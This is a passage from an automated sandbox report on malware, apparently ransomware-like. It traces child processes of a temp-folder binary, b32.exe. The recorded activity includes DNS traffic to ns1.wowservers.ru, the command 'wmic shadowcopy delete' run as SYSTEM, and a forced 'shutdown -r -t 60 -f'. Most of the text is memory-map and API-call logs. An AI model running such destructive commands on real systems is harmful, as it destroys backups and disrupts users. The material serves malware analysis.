System Get Time type = System Time, time = 2018-05-11 13:21:34 (UTC) True 1
Fn
System Get Time type = Ticks, time = 156843 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x4f0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = XDuwTfOno True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 94.249.60.127, 89.203.10.56, 189.75.183.21 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 570 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #12: wmic.exe
21 0
»
Information Value
ID #12
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:42
OS Process Information
»
Information Value
PID 0x110
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 4E8
0x 324
0x 344
0x 15C
0x 4F8
0x 4B8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable True False False -
wmic.exe.mui 0x000c0000 0x000cffff Memory Mapped File Readable, Writable False False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
msxml3r.dll 0x00210000 0x00210fff Memory Mapped File Readable False False False -
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0027ffff Private Memory - True False False -
private_0x0000000000280000 0x00280000 0x002fffff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x0035ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000300000 0x00300000 0x00301fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00310000 0x00310fff Memory Mapped File Readable False False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0035ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000360000 0x00360000 0x00361fff Pagefile Backed Memory Readable True False False -
index.dat 0x00370000 0x0037ffff Memory Mapped File Readable, Writable True False False -
index.dat 0x00380000 0x00387fff Memory Mapped File Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0042ffff Private Memory Readable, Writable True False False -
index.dat 0x003d0000 0x003dffff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000003f0000 0x003f0000 0x0042ffff Private Memory Readable, Writable True False False -
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory Readable True False False -
private_0x0000000000850000 0x00850000 0x0099ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00850000 0x0090ffff Memory Mapped File Readable, Writable False False False -
rsaenh.dll 0x00910000 0x0094bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000910000 0x00910000 0x0091cfff Pagefile Backed Memory Readable, Writable True False False -
wmiutils.dll.mui 0x00910000 0x00914fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000960000 0x00960000 0x0099ffff Private Memory Readable, Writable True False False -
private_0x00000000009a0000 0x009a0000 0x00adffff Private Memory Readable, Writable True False False -
private_0x00000000009a0000 0x009a0000 0x00a9ffff Private Memory Readable, Writable True False False -
private_0x0000000000aa0000 0x00aa0000 0x00adffff Private Memory Readable, Writable True False False -
private_0x0000000000ae0000 0x00ae0000 0x00b1ffff Private Memory Readable, Writable True False False -
private_0x0000000000b20000 0x00b20000 0x00b5ffff Private Memory Readable, Writable True False False -
wmic.exe 0x00b60000 0x00bc2fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000bd0000 0x00bd0000 0x01fcffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01fd0000 0x0229efff Memory Mapped File Readable False False False -
private_0x00000000022a0000 0x022a0000 0x024cffff Private Memory Readable, Writable True False False -
private_0x00000000022a0000 0x022a0000 0x0242ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000022a0000 0x022a0000 0x0237efff Pagefile Backed Memory Readable True False False -
private_0x0000000002380000 0x02380000 0x023bffff Private Memory Readable, Writable True False False -
private_0x00000000023f0000 0x023f0000 0x0242ffff Private Memory Readable, Writable True False False -
private_0x0000000002490000 0x02490000 0x024cffff Private Memory Readable, Writable True False False -
private_0x00000000024d0000 0x024d0000 0x028cffff Private Memory Readable, Writable True False False -
private_0x00000000028d0000 0x028d0000 0x02adffff Private Memory Readable, Writable True False False -
private_0x00000000028d0000 0x028d0000 0x0290ffff Private Memory Readable, Writable True False False -
private_0x0000000002970000 0x02970000 0x029affff Private Memory Readable, Writable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable True False False -
private_0x0000000002a10000 0x02a10000 0x02a4ffff Private Memory Readable, Writable True False False -
private_0x0000000002aa0000 0x02aa0000 0x02adffff Private Memory Readable, Writable True False False -
private_0x0000000002c20000 0x02c20000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002e10000 0x02e10000 0x02e1ffff Private Memory Readable, Writable True False False -
fastprox.dll 0x74ca0000 0x74d35fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x75440000 0x75456fff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x75480000 0x75497fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x754a0000 0x754aefff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x754b0000 0x75552fff Memory Mapped File Readable, Writable, Executable False False False -
msoxmlmf.dll 0x75560000 0x7556cfff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x75570000 0x756a2fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x756b0000 0x7570bfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x75710000 0x75719fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x75720000 0x75727fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75730000 0x7573cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x75740000 0x75774fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x4e8
21 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:21:39 (UTC) True 1
Fn
System Get Time type = Ticks, time = 162662 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0xb60000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-05-11 23:21:41 (Local Time) True 1
Fn
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #14: cmd.exe
55 0
»
Information Value
ID #14
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:39
OS Process Information
»
Information Value
PID 0x7fc
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 73C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x00757fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001cf0000 0x01cf0000 0x02032fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02040000 0x0230efff Memory Mapped File Readable False False False -
cmd.exe 0x4a9a0000 0x4a9ebfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75430000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x73c
55 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 1602-08-19 10:55:38 (UTC) True 1
Fn
System Get Time type = Ticks, time = 165205 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a9a0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76003b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75ffa79d True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\shutdown.exe, os_pid = 0x978, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #15: iexplore.exe
0 0
»
Information Value
ID #15
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:39
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x7e8
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
